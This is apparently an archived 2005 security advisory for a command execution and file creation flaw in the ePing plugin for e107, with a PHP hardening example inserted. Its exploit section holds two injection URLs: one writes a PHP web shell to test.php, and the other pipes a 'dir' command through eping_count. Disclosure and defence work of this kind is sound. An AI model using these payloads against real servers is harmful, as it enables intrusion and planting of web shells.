OS2A-1001.txt

2005-08-09T00:00:00
ID PACKETSTORM:39156
Type packetstorm
Reporter Packet Storm
Modified 2005-08-09T00:00:00

Description

                                        
                                            `OS2A  
  
ePing Arbitrary File Creation/Command Execution Vulnerability  
  
  
OS2A ID: OS2A_1001   Status: Published 08/04/2005   Updated: 08/05/2005
Patch Released  
  
Class: File Creation/Command Execution   
Severity: CRITICAL  
  
  
Overview:  
ePing is a ping utility plugin for e107, a PHP-based content management system that uses a MySQL backend database. ePing versions 1.02 and prior are vulnerable to a file creation vulnerability caused by improper validation of user-supplied input in the doping.php script. A remote attacker exploiting this vulnerability could create an arbitrary file on the webserver, or pipe additional system commands through the eping_host or eping_count parameters of the doping.php script; those commands would be executed within the security context of the hosting site.
  
eTrace, another utility plugin for e107, has similar vulnerabilities.
  
Description:  
The e107 portal's eping plugin, version 1.02 and prior, is prone to a remote command execution vulnerability. It exists because shell metacharacters such as the output redirection operator '>', the pipe '|' and '&' are not sanitized in the eping_host and eping_count parameters of the doping.php script.
  
eping_host is checked by a validate function in functions.php, but that function does not cover the characters mentioned above.
  
eping_count has no validation logic at all; it accepts the shell-significant characters mentioned above.
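The fix the description implies is to validate both parameters before they reach the shell. The following PHP is an added illustration of that hardening, not code from the ePing plugin or from e107; the function names (eping_validate_host, eping_validate_count, eping_build_command) and the limit of 10 pings are assumptions chosen for the example.

```php
<?php
// Added example (not the ePing plugin's own code): hardened handling of the
// two user-supplied parameters named in the advisory, eping_host and eping_count.
// Function names and the count limit are assumptions made for this illustration.

// Accept only an IPv4/IPv6 literal or a plain hostname made of RFC 1123 labels.
// Any value carrying shell metacharacters such as '>', '|' or '&' fails here.
function eping_validate_host(string $host): ?string
{
    $host = trim($host);
    if ($host === '' || strlen($host) > 253) {
        return null;
    }
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        return $host;
    }
    $label = '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    if (preg_match('/^' . $label . '(?:\.' . $label . ')*$/', $host) === 1) {
        return $host;
    }
    return null;
}

// The count must be a small positive integer. A value such as "2|dir" or
// "2 x >test.php" (the shapes used in the advisory) is refused because it is
// not purely digits.
function eping_validate_count(string $count): ?int
{
    $count = trim($count);
    if (preg_match('/^[0-9]{1,3}$/', $count) !== 1) {
        return null;
    }
    $n = (int) $count;
    return ($n >= 1 && $n <= 10) ? $n : null;
}

// Build the command line only from validated values, and still wrap each
// argument in escapeshellarg() as a second layer of defence. The command name
// and flag are fixed server-side; they are never taken from the request.
function eping_build_command(string $host, string $count): ?string
{
    $h = eping_validate_host($host);
    $n = eping_validate_count($count);
    if ($h === null || $n === null) {
        return null; // caller should show an error and run nothing
    }
    $flag = (stripos(PHP_OS, 'WIN') === 0) ? '-n' : '-c';
    return 'ping ' . $flag . ' ' . escapeshellarg((string) $n) . ' ' . escapeshellarg($h);
}

// Constructed sample inputs: the first pair is benign; the others mirror the
// shapes of the advisory's payloads and must all be rejected.
$samples = [
    ['127.0.0.1', '2'],
    ['127.0.0.1', '2|dir'],
    ['127.0.0.1', '2 x >test.php'],
    ['127.0.0.1|id', '2'],
    ['example.com', '3'],
];
foreach ($samples as [$host, $count]) {
    $cmd = eping_build_command($host, $count);
    printf("%-32s => %s\n", $host . ' / ' . $count, $cmd ?? 'REJECTED');
}
```

Run it with `php example.php`: the benign pairs produce a quoted ping command and every metacharacter-bearing value prints REJECTED. Note that the exploit URLs later on this page also pass an eping_cmd parameter; in this example the ping binary and its count flag are chosen in code rather than read from the request, which removes one more input from the shell entirely.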
  
  
Impact:  
A remote user can execute any command using the '|' character, or create a file containing malicious executable code using the '>' character. Execution of arbitrary commands or creation of arbitrary files can lead to denial of service, disclosure or modification of system information, or execution of arbitrary code.
  
  
Affected Systems:  
ePing version 1.02 and prior  
Linux (Any), Unix (Any), Windows (Any)  
  
  
Exploit:  
  
a.   
http://example.com/e107/e107_plugins/eping/doping.php?eping_cmd=ping%20-n&eping_host=127.0.0.1&eping_count=2%20%22%3C?php%20system(%94cmd.exe%94)?%3E%22%20%3Etest.php  
  
b.  
http://example.com/e107/e107_plugins/eping/doping.php?eping_cmd=ping%20-n&eping_host=127.0.0.1&eping_count=2|dir  
  
  
Solutions:  
Patch:  
Upgrade to version 1.03 of the ePing and eTrace plugins.